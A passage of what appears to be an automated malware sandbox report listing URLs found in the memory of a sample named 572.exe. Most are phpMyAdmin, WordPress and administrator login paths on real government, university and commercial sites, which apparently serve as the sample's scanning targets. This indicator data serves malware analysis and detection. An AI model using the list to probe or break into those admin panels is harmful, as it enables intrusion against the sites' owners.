                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://contribuyente.seniat.gob.ve/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://contribuyente.seniat.gob.ve/ndex.htm
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://contribuyente.seniat.gob.ve/wp-login.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://contribuyente.seniat.gob.ve/wp-login.phpre.steampowered
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.00000000390C6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4163206048.0000000040178000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039186000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
                Source: 572.exe, 00000009.00000003.4163206048.0000000040186000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047B06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4199132686.0000000039116000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304582370.00000000404EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.0000000039116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: 572.exe, 00000009.00000003.4304582370.00000000404EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4569330969.000000000492E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crlQ
                Source: 572.exe, 00000009.00000003.4390567048.0000000039186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crlV
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.00000000390C6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4163206048.0000000040178000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crlV
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl
                Source: 572.exe, 00000009.00000003.4003323359.00000000390E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                Source: 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl
                Source: explorer.exe, 00000002.00000000.2124664252.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: 572.exe, 00000009.00000003.4298111023.00000000406D1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl
                Source: explorer.exe, 00000002.00000000.2124664252.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2124664252.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl
                Source: 572.exe, 00000009.00000003.4304769446.000000004029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl
                Source: 572.exe, 00000009.00000003.4163206048.0000000040186000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.00000000391EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4485883302.000000004DF0B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304582370.00000000404EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039148000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                Source: 572.exe, 00000009.00000003.4390567048.00000000391EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E73A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406A8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4463057124.000000004E73B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.00000000390D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://developer.baidu.com/wiki/index.php?title=%E5%B8%AE%E5%8A%A9%E6%96%87%E6%A1%A3%E9%A6%96%E9%A1%
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://discord.c
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://discord.com/administrator/
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5F3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://discord.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://discord.com/administrator/index.phpindex.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://easygold.joyalukkas.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://easygold.joyalukkas.com/PhpMyAdmin/Hz
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://easygold.joyalukkas.com/administrator/
                Source: 572.exe, 00000009.00000003.4401816982.00000000392B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://easygold.joyalukkas.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4401816982.00000000392B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://easygold.joyalukkas.com/administrator/index.phpY
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://easygold.joyalukkas.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eei.uniandes.edu.co/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eei.uniandes.edu.co/PhpMyAdmin/95B
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eei.uniandes.edu.co/administrator/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eei.uniandes.edu.co/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eei.uniandes.edu.co/phpMyAdmin/:110
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eei.uniandes.edu.co/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eei.uniandes.edu.co/phpmyadmin/M
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/PhpMyAdmin/990
                Source: 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/admin.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/admin.phpn
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/administrator/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/administrator//
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/administrator/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/administrator/index.phpdex.phpept:
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4347804108.000000004E461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/phpmyadmin/iz.clF
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/phpmyadmin/min/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/wp-admin/
                Source: 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/wp-admin/3:30:02
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/wp-admin/idu.com
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://etd.lib.tuke.sk/wp-login.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://followerstiktok.xyz/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://followerstiktok.xyz/PhpMyAdmin/myadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://followerstiktok.xyz/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4299205287.00000000405EA000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://followerstiktok.xyz/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://followerstiktok.xyz/phpmyadmin/9
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://followerstiktok.xyz/wp-login.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://followerstiktok.xyz/wp-login.phpjR96cMPx
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/admin.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/admin.php/hp$
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/admin.phpmG~
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/wp-admin//b.mx
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://genshin.mihoyo.com/wp-login.php_
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gitam.zoom.us/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gitam.zoom.us/PhpMyAdmin/ux
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gitam.zoom.us/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gitam.zoom.us/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gitam.zoom.us/phpmyadmin/presse
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gitam.zoom.us/phpmyadmin/y
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hartico.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/administrator/index.phpc
                Source: 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/administrator/index.php~
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/phpmyadmin/administrator/
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hero-wars.com/wp-login.phpX
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iam.gov.sa/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iam.gov.sa/administrator/G~
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iam.gov.sa/administrator/index.php
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iam.gov.sa/administrator/index.php21/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iam.gov.sa/administrator/v
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://idp.uitgeverij-deviant.nl/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://idp.uitgeverij-deviant.nl/X3CRL.crl
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://idp.uitgeverij-deviant.nl/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://idp.uitgeverij-deviant.nl/administrator/)
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://idp.uitgeverij-deviant.nl/administrator/index.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://idp.uitgeverij-deviant.nl/administrator/index.php3510
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://idp.uitgeverij-deviant.nl/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/_editor/en/footer-eulogo-img.png
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/admin
                Source: 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/admin/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/adminagom.dpd.hu220
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/administrator/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/administrator/com.ar995
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/en
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/en/admin.php
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/en/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/en/wp-admin/
                Source: 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/hu/admin.php
                Source: 572.exe, 00000009.00000003.4307098588.000000000622F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/hu/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF1000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4315918557.000000004E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/hu/wp-admin/
                Source: 572.exe, 00000009.00000003.4557444059.0000000012BFC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://innovationdevelopment.eu/phpMyAdmin/
